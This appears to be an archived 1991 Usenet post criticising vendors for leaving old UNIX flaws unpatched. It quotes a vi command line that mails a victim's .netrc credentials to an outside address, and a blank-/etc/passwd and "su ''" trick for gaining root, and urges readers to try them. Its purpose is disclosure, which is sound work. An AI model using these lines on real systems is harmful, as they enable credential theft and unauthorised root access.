Questions about UNIX viruses

John Chambers jc at minya.UUCP
Sun Apr 14 02:26:01 AEST 1991

In article <2755 at legato.Legato.COM>, nowicki at legato (Bill Nowicki) writes:
> In article <11685 at dog.ee.lbl.gov> torek at elf.ee.lbl.gov (Chris Torek) writes:
> >... raisch at Control.COM (Robert Raisch) writes:
> >>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
> >>flaws in systems software to attack.  Both Sun and Dec were aware of these
> >>security holes as far back as 1980.
> >
> >Oh really?  Please produce some evidence to this effect.
> I would like to repeat this request. I was the software engineer
> working on sendmail for Sun at the time, and it was news to me.

The sendmail problem I don't  have  any  history  on,  but  there  are
several  other similar problems in Unix utilities for which I can give
examples with dates that show how hard it can be to get the news out.

Back in '83 (just after I moved to Massachusetts, to I know I have the
date right) there was a flurry of dire warnings  on  several  bulletin
boards  concerning  a  new  "feature"  in the vi editor.  This was the
ability of vi to notice  embedded  lines  starting  with  a  ':',  and
interpret  them as vi commands during initial loading of the file.  It
was pointed out  what  could  be  done  by  sending  mail  to  a  user
(especially a super-user) that contained lines like:
	:!mail joe at some.where <$HOME/.netrc
	:-,.d
This is of course a valuable feature of vi, but it should be  disabled
by  default (as it is now in most releases), so that the user must put
something in $EXINIT or .exrc to enable it.

It  has  been  8  years  since this was widely publicised.  Just a few
months ago I discovered that the vi from one  vendor  still  had  this
feature enabled by default. 8 years! I was tempted to email them a bug
report that did something like the above to illustrate the problem.  I
resisted, and just embedded a command like
	:!echo "There's a security hole in the vi editor."|mail root $USER
No, I won't tell you which vendor this was.  You should try it on your
system, and if it works, you know what to do.

For another example, it's now been almost exactly  10  years  since  I
learned  about  the problems caused by a blank line in the /etc/passwd
file.  Many vendors have fixed it; others haven't.  For instance, last
year I saw some shocked expressions on the faces of a number of people
at Digital when I asked them to add such a blank line, then typed:
	su ''
in a non-super-user window and immediately got a '#' prompt.  This was
on some Ultrix 3.1 systems.  Recently, I tried it on some 4.1 systems,
and to my relief it no longer worked.  But it took nearly a decade  to
correct this problem in Ultrix, and it has been know to me and others,
and described in articles like this, over and over and over.

You might try it on your system.  If it doesn't  work,  try  one  more
experiment.   With  the blank line in the password file and after your
entry, change your own password, and then try  the  "su  ''"  command.
Sometimes the blank line itself won't work, but when some user changes
his password, the rest of the /etc/passwd file gets rewritten, and the
blank line becomes:
	::0::::
which is the null-super-user entry that elicits the bug.

10 years!?

How do you get the  word  out?   Both  of  these  problems  have  been
thoroughly  documented on numerous bulletin-boards.  Lots of email has
passed back and forth describing them.   Why  the  #*&%^$&  is  it  so
difficult to correct such problems?

As for sendmail, well, I haven't  followed  the  appropriate  bulletin
boards  to  see  all the warnings that may or may not have been there.
But really, I don't need to.  Just look  around  at  how  sendmail  is
installed. Almost everywhere, it runs as root, talks on TCP port 25 in
ASCII to anyone who knows its language,  requires  no  authentication,
and is capable of running shell commands in response to its input. Add
to that the fact that it is "controlled" by  a  config  file  that  is
poorly understood by all but a handful of experts, and you have a sure
entryway for all sorts of unwanted actions.  I mean, it doesn't take a
genius  to  realize  the  potential.   How  could anyone with even the
slightest understanding of computer security not be suspicious?   What
bigger red flag could there possibly be?

[Well, OK, you could install DOS. ;-]

--
All opinions Copyright (c) 1991 by John Chambers.  Inquire for licensing at:
Home: 1-617-484-6393